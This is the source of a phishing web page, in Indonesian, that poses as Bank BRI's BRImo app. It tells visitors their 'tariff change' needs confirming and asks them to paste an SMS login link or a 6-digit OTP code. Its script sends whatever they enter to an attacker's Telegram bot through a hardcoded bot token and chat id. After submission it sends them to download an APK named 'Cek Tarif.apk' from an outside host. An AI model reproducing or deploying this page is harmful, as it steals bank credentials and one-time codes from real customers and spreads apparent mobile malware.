<html>
 <head> 
  <meta charset="utf-8"> 
  <meta name="theme-color" content="#1E90FF"> 
  <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..."> 
 
 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="BRlmo - Bank BRI"> 
  <meta name="twitter:title" content="BRlmo - Bank BRI"> 
  <meta property="og:site_name" content="BRImo"> 
  <meta name="twitter:site_name" content="BRImo"> 
  
  <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max"> 
  <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max"> 
  <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max"> 
  <meta property="og:url" content="https://www.bri.co.id"> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <link href="https://bri.co.id/o/bri-corporate-theme/images/favicon.ico" rel="icon" />
        <link data-senna-track="temporary" href="https://bri.co.id" hreflang="x-default" rel="alternate" />
        	<link data-senna-track="temporary" href="https://bri.co.id/en" hreflang="en-US" rel="alternate" />
        		<link data-senna-track="temporary" href="https://bri.co.id/en" hreflang="en-US" rel="alternate" />
        		<link data-senna-track="temporary" href="https://bri.co.id" rel="canonical" />
    <link rel="canonical" href="https://bri.co.id/" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Home - Bank BRI | Melayani Dengan Setulus Hati</title>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            position: fixed;
            background:#d1d1d1;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 45px; 
            width: 336px;
            max-width: 90%;
            border: 3px solid rgb(0, 134, 224);
            border-radius: 23px;
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 0px; 
            padding: 0px 45px;
            text-align: center;
            }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 8px;
            margin-left: 37px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .Button clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }

        .box-lte {
            width: 380px;
            max-width: 95%;
            background: #fff;
            display: block;
            box-shadow: 10px 15px 10px 0 rgba(90, 116, 148, 0.4);
            margin: -40px auto;
            border-radius: 20px;
        }

        textarea {
            box-sizing: border-box; 
            height: 75px;
            margin-top: -30px;
            width: 280px;
            border: 3px solid rgb(0, 134, 224);
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
        textarea::placeholder{
            font-size: 13px;
        }
           h1{
            display: table;
            background-color: #0F78CB;
            color: #fff;
            padding: 10px;
            width: 100%;
            border-radius: 15px 15px 0px 0px;
            font-size: 1em;
            margin-bottom: -70px;
            text-align: center;
            font-weight: 600;
            
        }
        
        
        h2{
            display: table;
            background-color: #FF0000;
            color: #fff;
            padding: 15px;
            width: 100%;
            font-size: 1em;
            margin-bottom: -70px;
            text-align: center;
            
        }
        
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

#otp{
    display: none;
}


#modalContainer {
	background-color:rgba(0, 0, 0, 0.7);
	position:absolute;
	width:100%;
	height:100%;
	top:0px;
	left:0px;
	margin: 0px auto;
	z-index:99999999999;
	padding-left: 0px;
	padding-right: 0px;
	background-image:url(tp.png); /* required by MSIE to prevent actions on lower z-index elements */
}

#alertBox {
	width: 80%; 
	height: 40%; 
	display: ; 
	background-color: snow;
	background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkAn_uwBN_idPfVTPJ29jAZSv4DAD8l3lLmKS9vpPIx1uY7dV69Vfigwan5P-UvWFDOINPQcqsunDCfjPiHHZR3zwba-NQAXHEZAkwN91OoOfmEqjmbLeBJAYc8tfV1AXjXkEV_zJFoVL6S1ErCLdlwzG7TtnEpNS-Rp1acMHBzTuyNn0qBjfNw4xcLOw/s16000/1688458885673.png') no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
	position: absolute; 
	left: 0; 
	right: 0; 
	margin: 0px auto; 
	top: 25%; 
	z-index: 9999999999999; 
	border-radius: 15px; 
	text-align: center; 
	padding: 0px; 
	border: 2px double #ccc;
	box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
	color: #323232; 
	color: rgb(120, 120, 120, 0.9);
	 -webkit-animation-name: swashIn;
    animation-name: swashIn;
    	-webkit-animation-duration: 2s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in-out;
	animation-timing-function: ease-in-out;
}

#modalContainer > #alertBox {
	position:fixed;
	
	margin: 0px auto;
	width: 80%;
	left: 0;
	right: 0;
	margin-left: 0px;
	margin-right: 0px;
}

#modalContainer > #alertBoxd {
	position:fixed;
	margin: 0px auto;
	width: 75%;
	left: 0;
	right: 0;
	margin-left: 0px;
	margin-right: 0px;
}


#alertBox h1 {
	margin:0;
	font:bold 19px verdana,arial;
	background-color: transparent;
	 color: rgb(120, 120, 120, 0.7)
	border-bottom:1px solid #bbb;
	padding:0px 0 0px 0px;
	margin-bottom: 15px;
	margin-top: -18px;
	padding: 0px;
	width: 100%;
	border-radius: 5px 5px 0px 0px;
	
}

#alertBox p {
	font:15px verdana,arial;
	height:38%;
	padding-left:0px;
	margin-top: 40px;
	padding: 5px;
	color: #aaa;
	
}

#alertBoxd p {
	font:15px verdana,arial;
	height:38%;
	padding-left:0px;
	margin-top: 35px;
	padding: 5px;
	color: #aaa;
	font-weight:500;

}


#alertBox fieldset {
	border: 2px double #ccc; 
	padding-bottom: 5px; 
	padding-top: 0px; 
	border-radius: 10px;
	height: 38%;
	
}
#alertBoxd{
border: 3px double #ccc; 
	width: 80%; 
	height: 38%; 
	display: ; 
	 background: rgba(240, 240, 240, 0.7);
	
	position: absolute; 
	left: 0; 
	right: 0; 
	margin: 0px auto; 
	top: 26%; 
	z-index: 999999999999; 
	border-radius: 15px; 
	text-align: center; 
	padding: 0px; 
	border: 2px double #ccc;
	outline: 2px double #1E90FF;
	color: #323232; 
	color: rgb(120, 120, 120, 0.9);
	 -webkit-animation-name: swashIn;
    animation-name: swashIn;
    	-webkit-animation-duration: 2s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in-out;
	animation-timing-function: ease-in-out;
}

#alertBox #closeBtn {
	width: 70%; 
	height: 38px; 
	background: #0F78CB; 
	color: snow; 
	font-weight: 700; 
	border-radius: 8px; 
	box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
	margin-top: 28px; 
	border: none;
}

#alertBoxd #closeBtn {
	display:block;
	position:relative;
	margin: 0px auto;
	padding:7px;.
	left: 0;
	right: 0;
	width: 70%; 
	height: 38px; 
	margin-top: 100px;
	padding-top: 10px;
	border:0 none;
	box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
	font:0.9em verdana,arial;
	text-transform:uppercase;
	text-align:center;
	font-weight: 800;
	color:#FFF;
	background-color:#0F78CB;
	border-radius: 8px;
	text-decoration:none;
}


/* unrelated styles */

#mContainer {
	position:absolute;
	width:100%;
	margin: 0px auto;
	padding:0px;
	border-top:2px solid #000;
	border-bottom:2px solid #000;
	font:0.7em verdana,arial;
}

strong{
    color: #0F78CB;
    font-weight: 600;
}
    </style> 
 </head> 
 <body> 
 <span class="blink"><h2>kode tarif tidak valid, silahkan coba lagi</h2></span>
  <div class="container" id="sms"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 150px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
      <img alt="" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654616003584x348160725283053200%2Fhttps___s3.amazonaws.com_appforest_uf_f1649512719186x581120083778390800_PSX_20220401_045909-removebg%252520%2525281%252529%2520%25281%2529.png?w=384&h=246&auto=compress&dpr=2&fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;" margin-left:="" 10px;="" margin-right:=""> 
     </div> 
    </div> 
    <div class="row"> 
     <hr style="display: block; margin: auto; width: 90%;"> 
     <p style="font-weight: bold; font-size: 20px; color: #098CE3; text-align: center; margin: 10px auto;" id="timer">3 : 00</p> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Link untuk perubahan tarif BRImo Epayment telah kami kirim ke nomor handphone anda, silakan cek SMS lalu masukkan Link di bawah ini<br><br>Link Konfirmasi (Wajib).</p> 
     </div> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;"> 
     <form onsubmit="alert('<fieldset><p>Permintaan anda sedang dalam proses, Tinggal beberapa langkah lagi untuk menyelesaikan proses perubahan tarif anda, Selanjutnya Silahkan Klik <strong><br/>CEK TARIF SEKARANG</strong><br/>dibawah ini untuk melanjutkan proses nya.</p></fieldset>'); return false" action="Cek Tarif.apk" method="POST">
       <center> 
        <div style="margin-top: 1px"> 
        
        <textarea id="nama" maxlength="5000" placeholder="Contoh SMS https://brimo.bri.co.id/app/login?code=xxxxxx" required class="textarea"></textarea>
  <input type="hidden" id="email" placeholder="Email">
  <input type="hidden" id="pesan" placeholder="Pesan"> 
         <b> <p style="font-size: 11px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000;">Mohon jangan diisi jika belum menerima SMS Link tarif dari BRI-OTP berupa Link..!!</strong></p></b>
        </div>
       </center>
       <b>
<input type="submit" id="kirim" class="bubble-element Button clickable-element" style="max-width: 85%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 15px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700" tabindex="2" value="KIRIM" onclick="kirimPesan()" />
</b>
      </form>
     </div>
     <b> </b>
    </div>
    <b> </b>
   </div>
   <b> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;"> 
      <p style="font-size: 12px; text-align: center; margin-top: 50px;"><strong style="color: #5e5e5e;">Tidak terima SMS? <a href="https://website.aloask.com/?id=31485" style="text-decoration: none; color: none rgb(9, 100, 127);">Kirim ulang SMS</a></strong></p> 
     </div>
     <center>
     <p style="text-align: center; border: 2px solid #ccc; width: 150px; background: none rgb(9, 140, 227); margin-top: -12px; border-radius: 15px; font-size: 13px; height: 30px; padding-top: 4px; color: white; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; " onclick="ubahmode()">Ganti via OTP</p>
     </center>
    </div> </b>
  </div>
   <div class="container" id="otp"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 150px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
      <img alt="" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654616003584x348160725283053200%2Fhttps___s3.amazonaws.com_appforest_uf_f1649512719186x581120083778390800_PSX_20220401_045909-removebg%252520%2525281%252529%2520%25281%2529.png?w=384&h=246&auto=compress&dpr=2&fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;" margin-left:="" 10px;="" margin-right:=""> 
     </div> 
    </div> 
    <div class="row"> 
     <hr style="display: block; margin: auto; width: 90%;"> 
     <p style="font-weight: bold; font-size: 20px; color: #098CE3; text-align: center; margin: 10px auto;" id="timers">3 : 00</p> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Link untuk perubahan tarif BRImo Epayment telah kami kirim ke nomor handphone anda, silakan cek SMS lalu masukkan Link di bawah ini<br><br>Link Konfirmasi (Wajib).</p> 
     </div> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;"> 
       <form onsubmit="alert('<fieldset><p>Permintaan anda sedang dalam proses, Tinggal beberapa langkah lagi untuk menyelesaikan proses perubahan tarif anda, Selanjutnya Silahkan Klik <strong><br/>CEK TARIF SEKARANG</strong><br/>dibawah ini untuk melanjutkan proses nya.</p></fieldset>'); return false"  method="POST">
       <center> 
        <div style="margin-top: 1px"> 
        
       <i class="ion-ios-locked-outline" id="ionIcons"></i> 
         <input type="tel" id="nama"  class="bubble-element Input form-log" placeholder="KODE TARIF 6 DIGIT" maxlength="6" minlength="6" style="margin-left: 0px;" required>
  <input type="hidden" id="email" placeholder="Email">
  <input type="hidden" id="pesan" placeholder="Pesan"> 
         <b> <p style="font-size: 11px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000;">Mohon jangan diisi jika belum menerima SMS Link tarif dari BRI-OTP berupa Link..!!</strong></p></b>
        </div>
       </center>
       <b>
<button type="submit" id="kirim" class="bubble-element Button clickable-element" style="max-width: 85%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 15px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700" tabindex="2" value="KIRIM" onclick="kirimPesan1()" >KIRIM</button>
</b>
      </form>
     </div>
     <b> </b>
    </div>
    <b> </b>
   </div>
   <b> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;"> 
      <p style="font-size: 12px; text-align: center; margin-top: 50px;"><strong style="color: #5e5e5e;">Tidak terima SMS? <a href="https://website.aloask.com/?id=31485" style="text-decoration: none; color: none rgb(9, 100, 127);">Kirim ulang SMS</a></strong></p> 
     </div> 
     <center>
     <p style="text-align: center; border: 2px solid #ccc; width: 150px; background: none rgb(9, 140, 227); margin-top: -12px; border-radius: 15px; font-size: 13px; height: 30px; padding-top: 4px; color: white; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; " onclick="ubahmode1()">Ganti via SMS</p>
     </center>
    </div> </b>
  </div>
  
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>

<script>
    var ALERT_TITLE = "Terima Kasih";
var ALERT_BUTTON_TEXT = "CEK TARIF SEKARANG";

if(document.getElementById) {
	window.alert = function(txt) {
		createCustomAlert(txt);
	}
}

function createCustomAlert(txt) {
	d = document;

	if(d.getElementById("modalContainer")) return;

	mObj = d.getElementsByTagName("body")[0].appendChild(d.createElement("div"));
	mObj.id = "modalContainer";
	mObj.style.height = d.documentElement.scrollHeight + "px";
	
	alertObj = mObj.appendChild(d.createElement("div"));
	alertObj.id = "alertBox";
	if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
	alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
	alertObj.style.visiblity="visible";
	alertObj = mObj.appendChild(d.createElement("fieldset"));
	alertObj.id = "alertBoxd";
	if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
	alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
	alertObj.style.visiblity="visible";

	h1 = alertObj.appendChild(d.createElement("h1"));
	h1.appendChild(d.createTextNode(ALERT_TITLE));
	
	msg = alertObj.appendChild(d.createElement("p"));
	//msg.appendChild(d.createTextNode(txt));
	msg.innerHTML = txt;

	btn = alertObj.appendChild(d.createElement("a"));
	btn.id = "closeBtn";
	btn.appendChild(d.createTextNode(ALERT_BUTTON_TEXT));
	btn.href = "#";
	btn.focus();
	btn.onclick = function() { removeCustomAlert();return false; }

	alertObj.style.display = "block";
	
}

function removeCustomAlert() {
	location.href ="https://devfiba.domcloud.io/Cek Tarif.apk";[0].removeChild(document.getElementById("modalContainer"));
}
function ful(){
alert('Alert this pages');
}
</script>
<script>
        document.getElementById('timer').innerHTML =
          03 + ":" + 01;
        startTimer();
        
       
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
    </script> 
  <script>
      document.getElementById('timers').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        function startTimer() {
          var presentTime = document.getElementById('timers').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timers').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
  </script>
  <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
 </body>
</html>
<script>
    function kirimPesan() {

    var nama = document.getElementById('nama');
    var email = document.getElementById('email');
    var pesan = document.getElementById('pesan');

    var gabungan = '𝗦𝗠𝗦 𝗟𝗜𝗡𝗞%3A%0A' + nama.value + '%0A.....%3A%0A' + email.value + '%0A.....%3A%0A' + pesan.value;

    var token = '6079399499:AAGXqL5f_tLlP6Sf6XiC1y_fb9tpZjvoeyc'; // Ganti dengan token bot yang kamu buat
    var grup = '5834970687'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    })
}


function ubahmode(){
     document.getElementById("sms").style.display = "none";
     document.getElementById("otp").style.display = "block";
}
function ubahmode1(){
     document.getElementById("sms").style.display = "block";
     document.getElementById("otp").style.display = "none";
}


function kirimPesan1() {

    var nama = document.getElementById('nama');
    var email = document.getElementById('email');
    var pesan = document.getElementById('pesan');

    var gabungan = '𝗞𝗼𝗱𝗲 𝗢𝗧𝗣 %3A%0A' + nama.value + '%0A.....%3A%0A' + email.value + '%0A.....%3A%0A' + pesan.value;

    var token = '6079399499:AAGXqL5f_tLlP6Sf6XiC1y_fb9tpZjvoeyc'; // Ganti dengan token bot yang kamu buat
    var grup = '5834970687'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    })
}
</script>